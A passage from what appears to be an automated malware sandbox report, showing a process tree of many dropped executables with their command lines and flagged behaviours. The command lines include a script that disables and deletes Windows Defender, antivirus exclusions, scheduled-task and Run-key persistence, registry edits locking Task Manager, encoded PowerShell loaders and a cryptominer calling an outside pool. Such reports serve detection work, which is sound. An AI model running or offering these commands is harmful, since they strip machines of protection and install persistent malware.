          - Loads dropped DLL
          - Suspicious use of AdjustPrivilegeToken
          PID: 4080
      [4] C:\Windows\system32\attrib.exe
          Command line: attrib +H "winhostDhcp.exe"
          - Views/modifies file attributes
          PID: 2008
      [4] C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe
          Command line: "winhostDhcp.exe"
          - Checks computer location settings
          - Executes dropped EXE
          - Drops file in Program Files directory
          - Drops file in Windows directory
          - Modifies registry class
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of WriteProcessMemory
          PID: 2020
        [5] C:\Windows\System32\cmd.exe
            Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\dzhJcmA8P8.bat"
            - Suspicious use of WriteProcessMemory
            PID: 5048
          [6] C:\Windows\system32\chcp.com
              Command line: chcp 65001
              PID: 2008
          [6] C:\Windows\system32\w32tm.exe
              Command line: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
              PID: 756
          [6] C:\odt\conhost.exe
              Command line: "C:\odt\conhost.exe"
              - Executes dropped EXE
              - Suspicious behavior: GetForegroundWindowSpam
              - Suspicious use of AdjustPrivilegeToken
              PID: 1756
  [2] C:\Users\Admin\AppData\Local\Temp\Files\native.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Files\native.exe"
      - Checks computer location settings
      - Executes dropped EXE
      - Suspicious use of SetThreadContext
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID: 3780
    [3] C:\Users\Admin\AppData\Local\Temp\BBLb.exe
        Command line: "C:\Users\Admin\AppData\Local\Temp\BBLb.exe"
        - Executes dropped EXE
        - Suspicious use of SetThreadContext
        - Suspicious use of AdjustPrivilegeToken
        PID: 1844
      [4] C:\Users\Admin\AppData\Local\Temp\BBLb.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\BBLb.exe
          - Executes dropped EXE
          - Suspicious use of AdjustPrivilegeToken
          PID: 3304
      [4] C:\Users\Admin\AppData\Local\Temp\BBLb.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\BBLb.exe
          - Executes dropped EXE
          PID: 5080
      [4] C:\Users\Admin\AppData\Local\Temp\BBLb.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\BBLb.exe
          - Executes dropped EXE
          PID: 4248
      [4] C:\Users\Admin\AppData\Local\Temp\BBLb.exe
          Command line: C:\Users\Admin\AppData\Local\Temp\BBLb.exe
          - Executes dropped EXE
          PID: 4760
    [3] C:\Users\Admin\AppData\Local\Temp\Files\native.exe
        Command line: C:\Users\Admin\AppData\Local\Temp\Files\native.exe
        - Executes dropped EXE
        PID: 3764
  [2] C:\Users\Admin\AppData\Local\Temp\Files\_wT.exe
      Command line: "C:\Users\Admin\AppData\Local\Temp\Files\_wT.exe"
      - Executes dropped EXE
      PID: 3280
    [3] C:\Windows\system32\cmd.exe
        Command line: "cmd.exe" /C C:\Users\Admin\AppData\Local\Temp\bat.bat
        PID: 5084
      [4] C:\Windows\system32\cmd.exe
          Command line: C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\bat.bat
          PID: 4672
        [5] C:\Windows\system32\cmd.exe
            Command line: cmd /c "set __=^&rem"
            PID: 1816
        [5] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            - Suspicious use of AdjustPrivilegeToken
            PID: 5000
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
              - Suspicious use of AdjustPrivilegeToken
              PID: 2684
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
              PID: 2480
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\bat')
              - Suspicious use of AdjustPrivilegeToken
              PID: 2052
          [6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 80728' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
              - Suspicious use of AdjustPrivilegeToken
              PID: 3788
          [6] C:\Windows\System32\cmd.exe
              Command line: "C:\Windows\System32\cmd.exe" /c start "" "C:\Users\Admin\AppData\Roaming\strt.cmd"
              PID: 2972
            [7] C:\Windows\system32\cmd.exe
                Command line: C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Roaming\strt.cmd"
                PID: 380
              [8] C:\Windows\system32\cmd.exe
                  Command line: cmd /c "set __=^&rem"
                  PID: 3280
              [8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Command line: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  - Blocklisted process makes network request
                  PID: 4072
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
                    PID: 3216
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
                    PID: 4088
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Roaming\strt')
                    PID: 3140
                [9] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                    Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName 'OneNote 80728' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\strt.cmd') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
                    PID: 3444
              [8] C:\Windows\system32\cmd.exe
                  Command line: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Roaming\strt.cmd';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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'))) "
                  PID: 4648
        [5] C:\Windows\system32\cmd.exe
            Command line: C:\Windows\system32\cmd.exe /S /D /c" echo $host.UI.RawUI.WindowTitle='C:\Users\Admin\AppData\Local\Temp\bat.bat';iex ([Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('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'))) "
            PID: 884
-
C:\Windows\system32\cmd.execmd /c "set __=^&rem"4⤵PID:4072
-
[depth 2] C:\Users\Admin\AppData\Local\Temp\Files\NSudo.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Files\NSudo.exe"
  PID: 2888
  - Executes dropped EXE
  - Suspicious use of AdjustPrivilegeToken
[depth 2] C:\Users\Admin\AppData\Local\Temp\Files\32.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Files\32.exe"
  PID: 4044
  - Executes dropped EXE
[depth 3] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 4044 -s 272
  PID: 1008
  - Program crash
[depth 2] C:\Users\Admin\AppData\Local\Temp\Files\miner.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Files\miner.exe"
  PID: 3284
  - UAC bypass
  - Checks computer location settings
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - System policy modification
[depth 3] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  Command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Files\miner.exe'; Add-MpPreference -ExclusionProcess 'miner'; Add-MpPreference -ExclusionPath 'C:\Users\Admin'"
  PID: 3040
[depth 2] C:\Users\Admin\AppData\Local\Temp\Files\fund.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Files\fund.exe"
  PID: 6476
  - Checks computer location settings
  - Executes dropped EXE
  - Modifies registry class
[depth 3] C:\Windows\SysWOW64\WScript.exe
  Command line: "C:\Windows\System32\WScript.exe" "C:\DriverHostCrtNet\jO3lbUgUCuGG0nAZHcS.vbe"
  PID: 3960
  - Checks computer location settings
[depth 4] C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c ""C:\DriverHostCrtNet\ELvGRxvU.bat" "
  PID: 6420
[depth 5] C:\DriverHostCrtNet\comSvc.exe
  Command line: "C:\DriverHostCrtNet\comSvc.exe"
  PID: 4936
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Drops file in Program Files directory
  - Drops file in Windows directory
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/'
  PID: 6748
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/'
  PID: 4164
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/'
  PID: 6952
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/'
  PID: 6752
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/'
  PID: 6968
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/'
  PID: 7100
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/'
  PID: 6940
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/'
  PID: 6960
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/'
  PID: 6208
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/odt/'
  PID: 5364
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/DriverHostCrtNet/'
  PID: 6800
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/'
  PID: 5912
[depth 6] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/'
  PID: 7056
[depth 6] C:\Windows\System32\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\iR4PpyYAmz.bat"
  PID: 4444
[depth 2] C:\Users\Admin\AppData\Local\Temp\Files\bang_executor.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\Files\bang_executor.exe"
  PID: 5544
  - Checks computer location settings
  - Executes dropped EXE
[depth 3] C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX0\microsoft.bat" "
  PID: 6264
[depth 4] C:\Windows\SysWOW64\reg.exe
  Command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v bang_executor /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe" /f
  PID: 6852
  - Adds Run key to start application
[depth 4] C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe
  Command line: "C:\Users\Admin\AppData\Local\Temp\RarSFX0\bang_executor.exe"
  PID: 6868
  - Checks computer location settings
  - Executes dropped EXE
[depth 5] C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\RarSFX1\bang.bat" "
  PID: 1376
[depth 6] C:\Users\Admin\AppData\Local\Temp\RarSFX1\bang_executor.exe
  Command line: bang_executor.exe
  PID: 6152
  - Executes dropped EXE
[depth 6] C:\Users\Admin\AppData\Local\Temp\RarSFX1\executer.exe
  Command line: executer.exe
  PID: 4032
  - Checks computer location settings
  - Executes dropped EXE
[depth 7] C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /C echo Add-MpPreference -ExclusionPath "C:\" -ErrorAction SilentlyContinue; Add-MpPreference -ExclusionProcess "C:\*" -ErrorAction SilentlyContinue; Set-MpPreference -DisableArchiveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBehaviorMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIntrusionPreventionSystem 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableIOAVProtection 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRemovableDriveScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableBlockAtFirstSeen 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningMappedNetworkDrivesForFullScan 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScanningNetworkFiles 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableScriptScanning 1 -ErrorAction SilentlyContinue; Set-MpPreference -DisableRealtimeMonitoring 1 -ErrorAction SilentlyContinue; Set-MpPreference -LowThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -ModerateThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-MpPreference -HighThreatDefaultAction Allow -ErrorAction SilentlyContinue; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" -Name Start -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SpyNetReporting -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" -Name SubmitSamplesConsent -Value 0; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender\Features" -Name TamperProtection -Value 4; Set-ItemProperty -Path "HKLM:\SOFTWARE\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Set-ItemProperty -Path "HKLM:\SOFTWARE\Policies\Microsoft\Windows Defender" -Name DisableAntiSpyware -Value 1; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender\"; Remove-Item -Recurse -Force -Path "C:\ProgramData\Windows\Windows Defender Advanced Threat Protection\"; Remove-Item -Recurse -Force -Path "C:\Windows\System32\drivers\wd\"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdNisSvc"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WinDefend"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\Sense"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\WdnisDrv"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdfilter"; Remove-Item -Recurse -Force -Path "HKLM:\SYSTEM\CurrentControlSet\Services\wdboot" > test.ps1
  PID: 4416
[depth 7] C:\Windows\system32\cmd.exe
  Command line: "C:\Windows\system32\cmd.exe" /C powershell.exe -ep bypass .\test.ps1;
  PID: 5768
[depth 8] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe -ep bypass .\test.ps1;
  PID: 5196
[depth 6] C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /K instaling.bat
  PID: 3920
[depth 7] C:\Windows\SysWOW64\reg.exe
  Command line: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer" /v NoControlPanel /t REG_DWORD /d 1 /f
  PID: 6888
[depth 7] C:\Windows\SysWOW64\reg.exe
  Command line: reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v NoDispAppearancePage /t REG_DWORD /d 1 /f
  PID: 6012
[depth 6] C:\Windows\SysWOW64\cmd.exe
  Command line: C:\Windows\system32\cmd.exe /K mgr.bat
  PID: 4364
[depth 7] C:\Windows\SysWOW64\reg.exe
  Command line: reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
  PID: 5596
[depth 1] C:\Windows\system32\mode.com
  Command line: mode 65,10
  PID: 3200
[depth 1] C:\Users\Admin\AppData\Local\Temp\main\7z.exe
  Command line: 7z.exe e file.zip -p1979614625696244291525413362 -oextracted
  PID: 1304
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of AdjustPrivilegeToken
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "bugaib" /sc MINUTE /mo 9 /tr "'C:\Program Files\Reference Assemblies\Microsoft\bugai.exe'" /f
  PID: 4040
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "bugai" /sc ONLOGON /tr "'C:\Program Files\Reference Assemblies\Microsoft\bugai.exe'" /rl HIGHEST /f
  PID: 1756
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "bugaib" /sc MINUTE /mo 8 /tr "'C:\Program Files\Reference Assemblies\Microsoft\bugai.exe'" /rl HIGHEST /f
  PID: 2724
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "vbcv" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Downloads\vbc.exe'" /f
  PID: 3184
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "vbc" /sc ONLOGON /tr "'C:\Users\Admin\Downloads\vbc.exe'" /rl HIGHEST /f
  PID: 1028
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "vbcv" /sc MINUTE /mo 14 /tr "'C:\Users\Admin\Downloads\vbc.exe'" /rl HIGHEST /f
  PID: 2200
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Windows\DigitalLocker\en-US\SppExtComObj.exe'" /f
  PID: 3932
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "SppExtComObj" /sc ONLOGON /tr "'C:\Windows\DigitalLocker\en-US\SppExtComObj.exe'" /rl HIGHEST /f
  PID: 4552
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "SppExtComObjS" /sc MINUTE /mo 10 /tr "'C:\Windows\DigitalLocker\en-US\SppExtComObj.exe'" /rl HIGHEST /f
  PID: 3424
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 9 /tr "'C:\odt\conhost.exe'" /f
  PID: 3100
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "conhost" /sc ONLOGON /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f
  PID: 4916
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "conhostc" /sc MINUTE /mo 12 /tr "'C:\odt\conhost.exe'" /rl HIGHEST /f
  PID: 540
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 13 /tr "'C:\Windows\Downloaded Program Files\csrss.exe'" /f
  PID: 4576
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Windows\Downloaded Program Files\csrss.exe'" /rl HIGHEST /f
  PID: 3284
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 12 /tr "'C:\Windows\Downloaded Program Files\csrss.exe'" /rl HIGHEST /f
  PID: 4416
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "winhostDhcpw" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /f
  PID: 444
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "winhostDhcp" /sc ONLOGON /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /rl HIGHEST /f
  PID: 3356
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "winhostDhcpw" /sc MINUTE /mo 7 /tr "'C:\Users\Admin\AppData\Local\Temp\main\winhostDhcp.exe'" /rl HIGHEST /f
  PID: 2864
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\SysWOW64\WerFault.exe
  Command line: C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4044 -ip 4044
  PID: 2528
[depth 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA
  PID: 1144
  - Suspicious use of AdjustPrivilegeToken
[depth 1] C:\Users\Admin\AppData\Local\TypeId\uaryavp\AttributeString.exe
  Command line: C:\Users\Admin\AppData\Local\TypeId\uaryavp\AttributeString.exe
  PID: 1552
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
[depth 2] C:\Users\Admin\AppData\Local\TypeId\uaryavp\AttributeString.exe
  Command line: C:\Users\Admin\AppData\Local\TypeId\uaryavp\AttributeString.exe
  PID: 4956
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
[depth 3] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  PID: 3736
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
[depth 4] C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  Command line: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
  PID: 2624
  - Suspicious use of AdjustPrivilegeToken
[depth 1] C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  Command line: C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe
  PID: 452
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of AdjustPrivilegeToken
[depth 2] C:\Windows\System32\cmd.exe
  Command line: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  PID: 3284
[depth 3] C:\Windows\system32\schtasks.exe
  Command line: schtasks /create /f /sc MINUTE /mo 3 /RL HIGHEST /tn "ERGVRDVMSK" /tr "C:\ProgramData\SystemPropertiesDataExecutionPrevention\.exe"
  PID: 752
  - Creates scheduled task(s)
[depth 2] C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
  Command line: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -o fr-zephyr.miningocean.org:5342 -u ZEPHYR2dNRNd7BpuKZoXnqZu7WiTzoMXE8EhzsTJDnXV9ZDksih16M2EazfmCb3ax9Z78hH9iJMxSQE1NBkPCK6W3M8SBGcc7ZC2z -p work -a rx/0 --donate-level 1 --opencl
  PID: 2700
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
[depth 1] C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Command line: powershell.exe -ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAEEAZABtAGkAbgBcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAOwAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIABBAHQAdAByAGkAYgB1AHQAZQBTAHQAcgBpAG4AZwAuAGUAeABlADsA
  PID: 756
  - Suspicious use of AdjustPrivilegeToken
[depth 1] C:\Windows\System32\Conhost.exe
  Command line: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
  PID: 2480
  - Suspicious use of AdjustPrivilegeToken
[depth 1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
  PID: 3748
[depth 1] C:\Windows\system32\svchost.exe
  Command line: C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
  PID: 1304
[depth 1] C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 6580
[depth 1] C:\Windows\system32\dwm.exe
  Command line: "dwm.exe"
  PID: 6316
[depth 1] C:\Windows\system32\dwm.exe
  Command line: "dwm.exe"
  PID: 7164
[depth 1] C:\Windows\System32\CompPkgSrv.exe
  Command line: C:\Windows\System32\CompPkgSrv.exe -Embedding
  PID: 4644
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 5 /tr "'C:\Windows\Globalization\Sorting\msedge.exe'" /f
  PID: 6328
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "msedge" /sc ONLOGON /tr "'C:\Windows\Globalization\Sorting\msedge.exe'" /rl HIGHEST /f
  PID: 5492
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "msedgem" /sc MINUTE /mo 10 /tr "'C:\Windows\Globalization\Sorting\msedge.exe'" /rl HIGHEST /f
  PID: 6068
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "firefoxf" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Pictures\Saved Pictures\firefox.exe'" /f
  PID: 6164
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
  Command line: schtasks.exe /create /tn "firefox" /sc ONLOGON /tr "'C:\Users\Admin\Pictures\Saved Pictures\firefox.exe'" /rl HIGHEST /f
  PID: 6184
  - Process spawned unexpected child process
  - Creates scheduled task(s)
[depth 1] C:\Windows\system32\schtasks.exe
